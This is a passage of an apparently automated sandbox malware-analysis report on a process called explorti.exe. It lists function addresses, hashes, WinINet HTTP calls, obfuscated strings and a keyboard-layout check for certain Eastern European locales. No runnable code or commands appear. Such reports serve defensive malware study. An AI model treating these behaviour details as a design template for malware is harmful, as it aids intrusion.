String ID:
API String ID:
Opcode ID: 92445183126d224b99a2b19426fda6b7a83ec99f1c78672818cedc6a4ac931c5
Instruction ID: 982dfba15757d66e96de02567eff2d1b6931d273d0eb0182ad52f2c3c4cdbe51
Opcode Fuzzy Hash: 92445183126d224b99a2b19426fda6b7a83ec99f1c78672818cedc6a4ac931c5
Instruction Fuzzy Hash: 6D11D6EB1482647EB181D0956B5CAF7675ED6C6730730C42BFC03C9906D2D51A5A3131

Function 05750CD8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61bb145c6ac29ebf97b46e5ba6bf394a217496d62392bc42c41ac1a2f3df6768
Instruction ID: 885fbb1cead020ecb4fb1ae2606492c5827cb623e5b87c69228972d0f6ab8f62
Opcode Fuzzy Hash: 61bb145c6ac29ebf97b46e5ba6bf394a217496d62392bc42c41ac1a2f3df6768
Instruction Fuzzy Hash: C211C8EB1083647EF181D1A56B6DAF7675ED6C6730B30C427FC03CAA42D2D51A5A7132

Function 05750D72 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f945ef53ea8712f5b3041831e449a518383020cbef182233b9d9e7f71e72455e
Instruction ID: 4c67a8c40fe348e16a9a145ac5d8e89d7b70a2fc09e2bc6a7dfc8f3b4ef25b72
Opcode Fuzzy Hash: f945ef53ea8712f5b3041831e449a518383020cbef182233b9d9e7f71e72455e
Instruction Fuzzy Hash: 3F016DAB14D370BEB182C0962B19AF7176ED6E2730730C826F843C4946C5C92A597172

Function 05750D4E Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709008477.0000000005750000.00000040.00001000.00020000.00000000.sdmp, Offset: 05750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5750000_11NdzR12PS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7188c6920792cf80f5c5500a368bda8ae9abaa459d0d013df081f0c83344195f
Instruction ID: f84d6f3d32bc60ff5f611cc50677e67b659d954ff03410b3279e51d02c1cf456
Opcode Fuzzy Hash: 7188c6920792cf80f5c5500a368bda8ae9abaa459d0d013df081f0c83344195f
Instruction Fuzzy Hash: 2CF0C2EB24C2247DB181D0922F18BF727AED6D6730730C526F803C4846C6C51A8A3131

Analysis Process: explorti.exePID: 7756, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.6%
Total number of Nodes:	608
Total number of Limit Nodes:	41

Executed Functions

Function 0069BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(006E8D68,00000000,00000000,00000000,00000000), ref: 0069BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0069BE11
HttpOpenRequestA.WININET(?,00000000), ref: 0069BE5A
HttpSendRequestA.WININET(?,00000000), ref: 0069BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0069BFCD
InternetCloseHandle.WININET(?), ref: 0069C0A7
InternetCloseHandle.WININET(?), ref: 0069C0AF
InternetCloseHandle.WININET(?), ref: 0069C0B7

Strings

invalid stoi argument, xrefs: 0069E404
PG3NVu==, xrefs: 0069BE33
PoPn, xrefs: 0069D516
6JLUcBRYEz9=, xrefs: 0069C385
stoi argument out of range, xrefs: 0069E3FA
d4o, xrefs: 0069E2FF
6JLUcxtnEx==, xrefs: 0069C2EB, 0069C543

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d4o$invalid stoi argument$stoi argument out of range
API String ID: 688256393-2268519430
Opcode ID: 5711c7c71e747a110d88c139b0ad292ada4e2171c79ba3e886d7d6b1d2aa83cd
Instruction ID: fe866a11a8adf3534f2e1dde47a5e48006700db9356906cbdc2bae11256da3e8
Opcode Fuzzy Hash: 5711c7c71e747a110d88c139b0ad292ada4e2171c79ba3e886d7d6b1d2aa83cd
Instruction Fuzzy Hash: 0AB1D2B1A001189BEF24DF28CD84BEEBB6AEF45314F5041ADF50997681D7719AC0CF99

Function 006A46C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 006A7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006A795C
Part of subcall function 006A7870: __Cnd_destroy_in_situ.LIBCPMT ref: 006A7968
Part of subcall function 006A7870: __Mtx_destroy_in_situ.LIBCPMT ref: 006A7971

Part of subcall function 0069BD60: InternetOpenW.WININET(006E8D68,00000000,00000000,00000000,00000000), ref: 0069BDED
Part of subcall function 0069BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0069BE11
Part of subcall function 0069BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0069BE5A

std::_Xinvalid_argument.LIBCPMT ref: 006A4EA2

Strings

7470, xrefs: 006A531D
Dy==, xrefs: 006A369E, 006A4D2D
8lU=, xrefs: 006A6383, 006A6652
Toe0, xrefs: 006A5447
KIK+, xrefs: 006A47BD, 006A48EC, 006A4ADC, 006A4C0B
7JS0, xrefs: 006A5351
9pG0, xrefs: 006A54DB
KIG+, xrefs: 006A4776, 006A47ED, 006A4A95, 006A4B0C
stoi argument out of range, xrefs: 006A4269, 006A4EAC
84K0, xrefs: 006A5497
TZS0, xrefs: 006A537A
-o, xrefs: 006A4F3A
9YY0, xrefs: 006A53CC
6YK0, xrefs: 006A5502
UIU0, xrefs: 006A53A3
75G0, xrefs: 006A5470
8IG0, xrefs: 006A53F5
TZC0, xrefs: 006A541E
0657d1, xrefs: 006A5489
IEYUMK==, xrefs: 006A54B9
85K3cq==, xrefs: 006A4712
246122658369, xrefs: 006A4F4D, 006A4F8F, 006A4F99, 006A54F4

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-o
API String ID: 2414744145-3083535771
Opcode ID: 064077b7f1c815a681dfca1bb19931d3fcef02e58b14b96f5d1151fa8775b733
Instruction ID: da52df81b2c448ea3d5001c782d8ceec48c681a54a136dedc4ed50263ef5e807
Opcode Fuzzy Hash: 064077b7f1c815a681dfca1bb19931d3fcef02e58b14b96f5d1151fa8775b733
Instruction Fuzzy Hash: 9523F371E001588BEB19EB28CD8979DBB77AB82304F5481DCE009AB2C6DB759F84CF55

Function 00695DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 0069600A
00000419, xrefs: 00695FA8
Keyboard Layout\Preload, xrefs: 00695F64
00000422, xrefs: 00695FD9
0000043f, xrefs: 0069603B

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 9e6f979058bacdfbbe6d967ef3e38bbbff8c658defdb92cacd1be8567acc6b74
Instruction ID: 0dccbd5ccdec16ae3e4e165f3b9ef2e2e335de9bfb23887022f321017dc9e0c9
Opcode Fuzzy Hash: 9e6f979058bacdfbbe6d967ef3e38bbbff8c658defdb92cacd1be8567acc6b74
Instruction Fuzzy Hash: 75E18C71900218ABEF25DFA4CC89BDDB7BAEB05304F5042D9E409A7691D774AFC48F51

Function 00697D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00697EA3

Strings

HlurOK==, xrefs: 00698062
HlusMa==, xrefs: 0069810A
HlurNa==, xrefs: 006981B2

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==
API String ID: 1721193555-2203186029
Opcode ID: 0467685a07af45a74d2988cc3296480234bc785541c8434b2a39c1d70e9048bd
Instruction ID: ed8294e8fb1d1cac8eef5914ae00e88e41b07cfd0c192c11b6235316058bfad9
Opcode Fuzzy Hash: 0467685a07af45a74d2988cc3296480234bc785541c8434b2a39c1d70e9048bd
Instruction Fuzzy Hash: 1ED10571E006189BDF14BB28CC5A3AD7777AB42320F50429CE4066B7C2DB758F918BD6

Function 006C6E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 006C6E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 006C6E7D
__dosmaperr.LIBCMT ref: 006C6F12

Part of subcall function 006C7177: __dosmaperr.LIBCMT ref: 006C71AC

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 214ceae986b7b1514f56ca1d861e5c8b113abeb1f51bc9bdbb3ed662c8b4ace1
Instruction ID: 1cdd38171965f211317df20e229ceaa2f1df84b9a68b789b4844f174ddf75aa4
Opcode Fuzzy Hash: 214ceae986b7b1514f56ca1d861e5c8b113abeb1f51bc9bdbb3ed662c8b4ace1
Instruction Fuzzy Hash: 4F413D75900244ABDB24EFB5E841EBBBBFBEF89304B14842DF556D3610EB30A905CB65

Function 006CD4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hpGl, xrefs: 006CD4FB

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: hpGl
API String ID: 0-1880857617
Opcode ID: b560b375ed23ef847624de88f62062782bc048b72e15a6b80cbb228b1ab64477
Instruction ID: ff9f75e4178e0725836d360a71c641ac41d4199ba128849e0bd263216668d3ec
Opcode Fuzzy Hash: b560b375ed23ef847624de88f62062782bc048b72e15a6b80cbb228b1ab64477
Instruction Fuzzy Hash: 7761EF729002149BDF25EFA9D885FFDB7A3EB55318F24813EE449AB390D6309C01CBA5

Function 006982B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00698454

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 4d1300d9b14b9a821fe7247954227179a3245b22739c819e3a5159865679dd72
Instruction ID: 3f2e4a1f702d25124f88202605efe9a589e59b53dffac64e42050f2e7de08921
Opcode Fuzzy Hash: 4d1300d9b14b9a821fe7247954227179a3245b22739c819e3a5159865679dd72
Instruction Fuzzy Hash: 25514871D002189FEF14EB68CD457EDB7BAEF46704F5042A9E805A7781EF349E808BA5

Function 006C6C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed6498ac25813df91f6f1d59e70849eeb97a10402f63049144464a37fc38181c
Instruction ID: 5a7aad142fc6ba8dd167c41fd0f04a55933a6d2bdd516a6178282991c23cf7b5
Opcode Fuzzy Hash: ed6498ac25813df91f6f1d59e70849eeb97a10402f63049144464a37fc38181c
Instruction Fuzzy Hash: 1921F831A052087AEB11BB64DC42FBE376BDF41338F10431DF9252B2D1DB70AE0596A9

Function 006C6F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 006C6FB3

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: fcd095c9f9d02914c5232d05aad0d9096f4bf91d8b6c0046655879e451539437
Instruction ID: 09912907d30fc434b4ace23da0857bda9014490b2ee228033ae34d8b399dd60e
Opcode Fuzzy Hash: fcd095c9f9d02914c5232d05aad0d9096f4bf91d8b6c0046655879e451539437
Instruction Fuzzy Hash: 2011DD7290020CABDB11DE95D940EEFB7BEEB08314F50526AF525E7180EB30EB44CBA5

Function 006CD6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,006CA5ED,?,006C74AE,?,00000000,?), ref: 006CD731

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d58e7a5259ffe23c511dcc8a9a0e9e0a5fefa6521aa6e873c548a11a2a80b62b
Instruction ID: 749713c9ed72c8b894d2a5a11c1a9f9fd0b389af2971cf296e5d1d194fe5236e
Opcode Fuzzy Hash: d58e7a5259ffe23c511dcc8a9a0e9e0a5fefa6521aa6e873c548a11a2a80b62b
Instruction Fuzzy Hash: 6DF02731645225A69B313B269C05FBB7B9BDF817B0B18853DBC08EB281CF31E80186F4

Function 006A6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 006A6B65

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

